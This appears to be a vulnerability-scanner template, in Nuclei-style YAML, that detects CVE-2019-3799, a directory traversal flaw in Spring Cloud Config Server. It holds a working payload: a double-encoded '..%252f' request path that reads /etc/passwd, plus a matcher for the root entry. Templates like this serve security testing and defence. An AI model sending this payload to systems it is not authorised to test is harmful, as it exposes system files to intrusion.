id: CVE-2019-3799 info: name: Spring-Cloud-Config-Server Directory Traversal author: madrobot severity: high tags: cve,cve2019,traversal requests: - method: GET path: - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - 'root:[x*]:0:0:' part: body